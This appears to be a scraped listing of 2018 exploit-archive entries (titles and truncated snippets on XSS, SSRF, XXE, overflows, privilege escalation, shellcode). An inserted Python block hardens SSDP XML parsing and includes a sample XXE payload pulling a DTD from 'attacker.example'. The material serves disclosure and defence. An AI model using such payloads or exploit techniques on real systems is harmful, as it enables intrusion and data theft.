Wavemaker Studio 6.6 - Server-Side Request Forgery
Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery SSRF. Exploit Author: Gionathan "John" Reale Google Dork: N/A Date: 2018-08-01 Vendor Homepage: http://www.wavemaker.com/ Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/ Affected Version...
Monstra 3.0.4 - Cross-Site Scripting
Monstra 3.0.4 - Cross-Site Scripting. CVE-2018-14922. Webapps exploit for PHP platform Exploit Title:Monstra-Dev 3.0.4 Stored Cross Site Scripting Date: 04-08-2018 Exploit Author: Nainsi Gupta Vendor Homepage: http://monstra.org/ Software Link: https://github.com/monstra-cms/monstra Published In-...
Open-AudIT Community 2.2.6 - Cross-Site Scripting
Exploit Title: Open-AudIT Community 2.2.6 - Cross-Site Scripting Google Dork: N/A Exploit Date: 2018-08-01 Exploit Author: Ranjeet Jaiswal Vendor Homepage: https://opmantek.com/ Software Link: https://opmantek.com/network-tools-download/open-audit/ Affected Version: 2.2.6 Category: WebApps Tested on...
LAMS < 3.1 - Cross-Site Scripting
Exploit Title: LAMS 3.1 - Cross-Site Scripting Date: 2018-08-05 Exploit Author: Nikola Kojic Website: https://ras-it.rs/ Vendor Homepage: https://www.lamsfoundation.org/ Software Link: https://www.lamsfoundation.org/downloadshome.htm Category: Web Application Platform: Java Version: = 3.1 CVE:...
CMS ISWEB 3.5.3 - Directory Traversal
Exploit Title: CMS ISWEB 3.5.3 - Directory Traversal Date: 2018-08-01 Exploit Author: Thiago "thxsena" Sena Vendor Homepage: http://www.isweb.it Version: 3.5.3 Tested on: Linux CVE : N/A PoC: CMS ISWEB 3.5.3 is vulnerable to directory traversal and local file download, as demonstrated by...
Sitecore.Net 8.1 - Directory Traversal
Exploit Title: Sitecore.Net 8.1 - Directory Traversal Date: 2018-04-23 CVE: CVE-2018-7669 Researcher: Chris Moberly at The Missing Link Security Vendor: Sitecore Version: CMS 8.1 and up (earlier versions untested) Authentication required: Yes An issue was discovered in Sitecore CMS that affects a...
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)
Exploit Title: CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) Date: 2018-08-05 Exploit Author: Manoj Ahuje Linkedin: https://www.linkedin.com/in/manojahuje/ Vendor Homepage: https://www.cloudme.com/ Software Link: https://www.cloudme.com/downloads/CloudMe1109.exe Tested on: Windows 10 Home x...
Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation
#include "stdafx.h" #include #include #include #include #pragma comment(lib, "psapi") PULONGLONG leakbuffer = (PULONGLONG)VirtualAlloc((LPVOID)0x000000001a000000, 0x2000, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE); ULONGLONG leakQWORD(ULONGLONG addr, HANDLE driver) { memset((LPVOID)0x000000001a000000, 0x11, 0x1000);...
Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection
Issue: Out-of-Band XXE in Plex Media Server's SSDP Processing Reserved CVE: CVE-2018-13415 Vulnerability Overview The XML parsing engine for Plex Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same LAN can use...
Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes)
Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes). Shellcode exploit for Linux/x86 platform. Title: Linux/x86 - Reverse TCP shell IPv6 + Null Free Shellcode Author: Kartik Durg Shellcode Length: 86 bytes Student-ID: SLAE-1233 Note...
Linux/ARM - Bind (4444/TCP) Shell +IPv6 Shellcode (128 Bytes)
Linux/ARM - Bind 4444/TCP Shell +IPv6 Shellcode 128 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IPv6 4444/TCP Bind Shellcode 128 Bytes Date: 2018-07-25 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi 4.14.52-v7+ 1123 SMP...
Basic B2B Script 2.0.0 - Cross-Site Scripting
Basic B2B Script 2.0.0 - Cross-Site Scripting. CVE-2018-14541. Webapps exploit for PHP platform. Exploit Title: PHP Scripts Mall Basic B2B Script 2.0.0 has Stored XSS via the First name, Last name, Address 1, City, State, and Company name fields. Date: 20.07.2018 Site Title: B2B Script Vendor...
Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection
Issue: Out-of-Band XXE in Vuze Bittorrent Client's SSDP Processing Reserved CVE: CVE-2018-13417 Vulnerability Overview The XML parsing engine for Vuze Bittorrent Client's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Unauthenticated attackers on the same L...
PHP Template Store Script 3.0.6 - Cross-Site Scripting
Exploit Title: PHP Template Store Script 3.0.6 - Stored XSS via Address, Bank Name, and A/c Holder Name Date: 02.08.2018 Site Title: Exclusive Scripts Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: http://www.exclusivescript.com/ Category: Web Application Version: 3.0.6 Exploit...
Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting
Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting. CVE-2018-14082. Webapps exploit for PHP platform. Exploit Title: Entrepreneur Job Portal Script 3.0.1 has Stored XSS via Search bar and Location Date: 14.07.2018 Site Title: JOB SITE Job Portal Vendor Homepage:...
Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation', 'Description' => %q{ This module attempts to gain root privileges on Linux systems...
Wedding Slideshow Studio 1.36 - Buffer Overflow
Exploit Title: Socusoft Wedding Slideshow Studio 1.36 Date: 02.08.2018 Exploit Author: Achilles Vendor Homepage: http://www.socusoft.com Vulnerable Software: http://www.socusoft.com/down/wedding-slideshow-studio.exe Tested on OS: Windows 7 64-bit DE Steps to reproduce: Copy the contents of the...
cgit < 1.2.1 - 'cgit_clone_objects()' Directory Traversal
There is a directory traversal vulnerability in cgit_clone_objects(), reachable when the configuration flag enable-http-clone is set to 1 (default): void cgit_clone_objects(void) { if (!ctx.qry.path) { cgit_print_error_page(400, "Bad request", "Bad request"); return; } if (!strcmp(ctx.qry.path, "info/packs")) { print_pack_info...
Universal Media Server 7.1.0 - SSDP Processing XML External Entity Injection
Issue: Out-of-Band XXE in Universal Media Server's SSDP Processing Reserved CVE: CVE-2018-13416 Vulnerability Overview The XML parsing engine for Universal Media Server's SSDP/UPNP functionality is vulnerable to an XML External Entity Processing XXE attack. Unauthenticated attackers on the same L...
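The three SSDP XXE entries above (Plex Media Server, Vuze Bittorrent Client, Universal Media Server) describe the same mechanism: an XML parser that honours DTDs and external entities is handed a UPnP device description by whoever is on the LAN. The block below is an added illustration and is not code from any of those projects or from the advisories. It pulls the LOCATION header out of a constructed SSDP NOTIFY, refuses non-HTTP locations, and parses a constructed device description with every DTD mechanism disabled, so an out-of-band XXE payload aborts the parse instead of causing a request to the attacker's host. The 192.0.2.10 address, the UUIDs and `attacker.example` are placeholders; the fetch of the LOCATION URL is left to the caller.

```python
# Added example, not Plex/Vuze/UMS source. Sample SSDP datagram and XML are
# constructed; addresses, UUIDs and attacker.example are placeholders.
import xml.parsers.expat


class DtdRejected(Exception):
    """Raised when a device description carries a DOCTYPE or an entity declaration."""


def parse_ssdp_location(datagram: bytes) -> str:
    """Return the LOCATION URL from an SSDP NOTIFY / M-SEARCH response.

    Only http(s) URLs are accepted, so a client never follows file://, ftp://
    or similar locations that an unauthenticated LAN host can hand it over UDP.
    """
    lines = datagram.decode("ascii", errors="replace").split("\r\n")
    for line in lines[1:]:              # lines[0] is the request/status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "location":
            url = value.strip()
            if url.lower().startswith(("http://", "https://")):
                return url
            raise ValueError("refusing non-HTTP LOCATION: %r" % url)
    raise ValueError("no LOCATION header in SSDP message")


def parse_device_description(body: bytes) -> dict:
    """Parse a UPnP device description with DTD processing switched off.

    expat only fetches external entities when a handler asks for them. Here
    any DOCTYPE or entity declaration aborts the parse, parameter entities are
    never expanded, and external entity references are never followed, which
    is what blocks an out-of-band XXE payload from reaching the network.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise DtdRejected("DOCTYPE %r (system id %r) not allowed" % (name, sysid))

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise DtdRejected("entity declaration %r not allowed" % name)

    def never_follow(context, base, sysid, pubid):
        return 0   # 0 = "not handled": expat will not resolve the reference

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = never_follow

    wanted = ("friendlyName", "modelName", "UDN")
    fields = {}
    text_parts = []

    def start(name, attrs):
        text_parts.clear()

    def end(name):
        if name in wanted:
            fields[name] = "".join(text_parts).strip()

    def chars(data):
        text_parts.append(data)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(body, True)
    return fields


# Constructed SSDP announcement such as a renderer would multicast on the LAN.
SSDP_NOTIFY = (
    b"NOTIFY * HTTP/1.1\r\n"
    b"HOST: 239.255.255.250:1900\r\n"
    b"NT: upnp:rootdevice\r\n"
    b"NTS: ssdp:alive\r\n"
    b"LOCATION: http://192.0.2.10:49152/description.xml\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000001::upnp:rootdevice\r\n"
    b"\r\n"
)

# Constructed benign device description (what LOCATION would normally serve).
BENIGN_DESCRIPTION = b"""<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device>
    <deviceType>urn:schemas-upnp-org:device:MediaRenderer:1</deviceType>
    <friendlyName>Living room TV</friendlyName>
    <modelName>Example Renderer</modelName>
    <UDN>uuid:00000000-0000-0000-0000-000000000001</UDN>
  </device>
</root>"""

# Constructed out-of-band XXE shape: a parameter entity pulls a DTD from the
# attacker's host, which in turn would exfiltrate data. Placeholder host name.
XXE_DESCRIPTION = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  %remote;
]>
<root xmlns="urn:schemas-upnp-org:device-1-0">
  <device><friendlyName>pwned</friendlyName></device>
</root>"""
```

A client that must keep DTD support for some other reason should at minimum keep `ExternalEntityRefHandler` returning 0 and parameter-entity parsing at NEVER; rejecting the DOCTYPE outright is simpler and is what a device description never legitimately needs.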
Seq 4.2.476 - Authentication Bypass
Exploit Title: Seq 4.2.476 - Authentication Bypass Date: 2018-08-02 Exploit Author: Daniel Chactoura Vendor Homepage: https://getseq.net/ Software Link: https://getseq.net/Download/All Version: = 4.2.476 CVE : CVE-2018-8096 Post Reference:...
PageResponse FB Inboxer Add-on 1.2 - 'search_field' SQL Injection
Exploit Title: FB Inboxer 1.2 - 'search_field' SQL Injection Google Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/pageresponse-a-fb-inboxer-addon-facebook-auto-commentprivate-reply-likeshare-for-full-page/21486371 Version: 1.2...
WityCMS 0.6.2 - Cross-Site Request Forgery (Password Change)
input t...
ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution
Exploit Title: ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution Date: 2018-08-02 Exploit Author: Fakhri Zulkifli (@d0lph1n98) Vendor Homepage: https://www.asus.com/ Software Link: https://www.asus.com/Networking/DSLN12EC1/HelpDeskBIOS/ Version: 1.1.2.3_345 Tested on: 1.1.2.3_345 GET...
CoSoSys Endpoint Protector 4.5.0.1 - (Authenticated) Remote Root Command Injection
Title : CoSoSys Endpoint Protector - Authenticated Remote Root Command Injection Date : Vulnerability submitted in 01/12/2017 and published in 01/08/2018 Author : 0x09AL Tested on : Endpoint Protector 4.5.0.1 Software Link : https://www.endpointprotector.com/ Vulnerable Versions : Endpoint...
Sun Solaris 11.3 AVS Kernel - Local Privilege Escalation
/ Exploit Title: Solaris/OpenSolaris AVS kernel code execution Google Dork: if applicable Date: 24/7/2018 Exploit Author: mu-b Vendor Homepage: oracle.com Software Link: Version: Solaris 10, Solaris Sun Opensolaris include include include include include include include include include include...
Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting
Chartered Accountant : Auditor Website 2.0.1 - Cross-Site Scripting. CVE-2018-13256. Webapps exploit for PHP platform. Tags: Cross-Site Scripting XSS Exploit Title: Chartered Accountant : Auditor Website 2.0.1 - Reflected , Stored XSS Date: 26.06.2018 Site Titel : Find your needs on Domain Name...
TI Online Examination System v2 - Arbitrary File Download
Exploit Title: TI Online Examination System v2 - Arbitrary File Download Dork: N/A Date: 02.08.2018 Exploit Author: Özkan Mustafa Akkuş AkkuS Vendor Homepage: https://codecanyon.net/item/ti-online-examination-system-v2/11248904 Version: 2.0 Category: Webapps Tested on: Kali linux Description : Th...
Imperva SecureSphere 11.5 / 12.0 / 13.0 - Privilege Escalation
Title: Imperva SecureSphere <= v13 - Privilege Escalation Author: 0x09AL Date: 01/08/2018 Tested on: Imperva SecureSphere 11.5, 12.0, 13.0 Vendor: https://www.imperva.com/ Vulnerability Description: There is a program named PCE.py which runs as root and starts a unix domain socket listener in...
AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)
Exploit Title: AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC) Discovery by: Luis Martinez Discovery Date: 2018-08-02 Vendor Homepage: http://agatasoft.com/ Software Link: http://agatasoft.com/PingMaster.exe Tested Version: 1.5 Vulnerability Type: Denial of Service (DoS) Local...
SecureSphere 12.0.0.50 - SealMode Shell Escape (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SecureSphere v12.0.0.50 - SealMode Shell Escape (root)", 'Description' => %q{ This module exploits a vulnerability in SecureSphere cli to escape the...
WebRTC - FEC Processing Overflow
There are several calls to memcpy that can overflow the destination buffer in webrtc::UlpfecReceiverImpl::AddReceivedRedPacket. The method takes a parameter incoming_rtp_packet, which is an RTP packet with a max length that is defined by the transport (2048 bytes for DTLS in Chrome). This packet is...
Linux/ARM - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (116 Bytes)
Linux/ARM - Reverse ::1:4444/TCP Shell /bin/sh +IPv6 Shellcode 116 Bytes. Shellcode exploit for ARM platform / Title: Linux/ARM - IPv6 ::1 4444/TCP Reverse Shellcode 116 Bytes Date: 2018-07-25 Tested: armv7l Raspberry Pi 3 Model B+ Author: Ken Kitahara pi@raspberrypi: $ uname -a Linux raspberrypi...
WebRTC - VP8 Block Decoding Use-After-Free
There is a use-after-free in VP8 block decoding in WebRTC. The contents of the freed block are then treated as a pointer, leading to a crash in WebRTC. ==20098==ERROR: AddressSanitizer: heap-use-after-free on address 0x6330000a9491 at pc 0x0000014cde2f bp 0x7ff20616d7e0 sp 0x7ff20616d7d8 READ of size...
WebRTC - H264 NAL Packet Processing Type Confusion
Type confusion can occur when processing an H264 packet. In the method PacketBuffer::FindFrames in modules/video_coding/packet_buffer.cc there is a loop on line 296 that goes through the data_buffer_ vector backwards. The flag is_h264 is set before this loop, and if it is true, the loop extracts and se...
SonicWall Global Management System - XMLRPC set_time_zone Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE", 'Description' => %q{ This module exploits a vulnerability in SonicWall Global...
Allok Fast AVI MPEG Splitter 1.2 - Buffer Overflow (PoC)
Exploit Title: Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC Vulnerability Type: SEH Overwrite POC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovery Date: 2018-08-01 Software Link: http://www.alloksoft.com/fastsplitter.htm Tested Version: 1.2 Tested on OS:...
Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service (PoC)
Exploit Title: Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://switchportmapper.com/ Software Link : http://download.switchportmapper.com/spm281.zip Tested Version: 2.81 Vulnerability Type:...
ipPulse 1.92 - 'Licence Key' Denial of Service (PoC)
Exploit Title: ipPulse 1.92 - 'License Key' Denial of Service PoC Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Discovery Date: 2018-07-30 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link: http://download.netscantools.com/ipls192.zip Tested...
LG NAS 3718.510.a0 - Remote Command Execution
LG NAS 3718.510.a0 - Remote Command Execution Author: @0x616163 Date: 2018-07-29 Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ CVE: N/A Firmware Version: 3718.510.a0 #!/usr/bin/env python import sys import argparse import requests from collections...
Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection
Exploit Title: Craft CMS SEOmatic plugin 3.1.4 - Server-Side Template Injection Date: 2018-07-20 Software Link: https://github.com/nystudio107/craft-seomatic Exploit Author: Sebastian Kriesten 0xB455 Contact: https://twitter.com/0xB455 CVE: CVE-2018-14716 Category: webapps 1. Description An...
Responsive Filemanager 9.13.1 - Server-Side Request Forgery
Exploit Title: Responsive filemanager 9.13.1 - Server-Side Request Forgery Date: 2018-07-29 Exploit Author: GUIA BRAHIM FOUAD Vendor Homepage: http://responsivefilemanager.com/ Software Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.1/responsivefilemanager.zip...
Allok MOV Converter 4.6.1217 - Buffer Overflow (SEH)
Exploit Title: Allok MOV Converter 4.6.1217 - Buffer Overflow SEH Date: 2018-07-29 Discovery by: Shubham Singh Known As: Spirited Wolf Twitter: @Pwsecspirit Software Link: http://www.alloksoft.com/allokmovconverter.exe Tested Version: 4.6.1217 Tested on OS: Windows XP Service Pack 3 x86 Greetz:...
fusermount - user_allow_other Restriction Bypass and SELinux Label Control
/ It is possible to bypass fusermount's restrictions on the use of the "allow_other" mount option as follows if SELinux is active. Here's a minimal demo, tested on a Debian system with SELinux enabled in permissive mode: =============================================== user@debian:~$ mount|grep...
Charles Proxy 4.2 - Local Privilege Escalation
Charles Proxy is a great mac application for debugging web services and inspecting SSL traffic for any application on your machine. In order to inspect the SSL traffic it needs to configure the system to use a proxy so that it can capture the packets and use its custom root CA to decode the SSL...
Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC)
/ Exploit Title: Microsoft Windows Kernel - 'win32k!NtUserConsoleControl' Denial of Service (PoC) Author: vportal Date: 2018-07-27 Vendor homepage: http://www.microsoft.com Version: Windows 7 x86 Tested on: Windows 7 x86 CVE: N/A It is possible to trigger a BSOD caused by a Null pointer dereference...
ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)
Exploit Title: ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service PoC Discovery by: Luis Martinez Discovery Date: 2018-07-27 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link : http://download.netscantools.com/ipls192.zip Tested Version: 1.92 Vulnerability...
H2 Database 1.4.197 - Information Disclosure
Exploit Title: H2 Database 1.4.197 - Information Disclosure Date: 2018-07-16 Exploit Author: owodelta Vendor Homepage: www.h2database.com Software Link: http://www.h2database.com/html/download.html Version: all versions Tested on: Linux CVE : CVE-2018-14335 Description: Insecure handling of...
WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "WordPress Responsive Thumbnail Slider Arbitrary File Upload", 'Description' => %q{ This module exploits an arbitrary file upload vulnerability in...
Skia - Heap Overflow in SkScan::FillPath due to Precision Error
There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrome and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached. Details: When Skia fills a path with antialiasing turned off,...
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)
Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service PoC Discovery by: Luis Martínez Discovery Date: 2018-07-26 Vendor Homepage: https://www.netscantools.com/ Software Link : http://download.netscantools.com/nstb250.zip Tested Version: 2.5 Vulnerability Type: Denial of...